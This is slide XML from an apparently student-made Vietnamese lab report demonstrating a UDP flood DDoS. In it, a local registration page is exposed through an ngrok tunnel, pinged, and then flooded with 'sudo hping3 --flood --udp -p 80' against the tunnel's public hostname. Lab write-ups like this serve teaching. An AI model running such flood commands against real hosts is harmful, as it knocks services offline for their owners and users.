              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cách</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>như</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vậy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>yếu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>làm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tắc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghẽn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sự</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phản</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hồi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> qua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>băng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, botnet,…etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bài</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</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Nguyễn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Lâm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nguồn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tham</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khảo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: AnonyViet.com, Whitehat.vn</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113613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92B4-D739-46F4-9215-57E47D86E346}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613539" y="262270"/>
            <a:ext cx="8596668" cy="786809"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ddos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> UDP Flood (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thuộc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tầng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> ):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21865B3D-66BA-4779-85DF-E567EBCF4BA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="1162493"/>
            <a:ext cx="8596668" cy="4878869"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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a:t>: 29/9/2024</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chuẩn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>như</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UPD Flood </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thuộc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhóm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>băng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thông</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Đặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>điểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</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này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Kẻ tấn công gửi một lượng lớn các gói tin UDP đến máy chủ mục tiêu, làm cạn kiệt băng thông mạng và gây ngưng trệ.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Khởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Khởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>laragon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mở</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://localhost/register.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Khởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ngrok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ngrok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> http 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đường</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dẫn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> https://8488-14-224-53-137.ngrok-free.app/register.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224083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34015-58DC-448C-9F62-E1D09A53DF77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="311889"/>
            <a:ext cx="8596668" cy="6365358"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ping 8488-14-224-53-137.ngrok-free.app ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PING 8488-14-224-53-137.ngrok-free.app (18.141.129.246) 56(84) bytes of data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>64 bytes from ec2-18-141-129-246.ap-southeast-1.compute.amazonaws.com (18.141.129.246): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>icmp_seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ttl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=115 time=68.9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ok </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vậy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tới</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tiếp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>theo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hping3 --flood --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p 80 8488-14-224-53-137.ngrok-free.app </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hoặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> dung </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host 8488-14-224-53-137.ngrok-free.app </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lấy</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và</a:t>
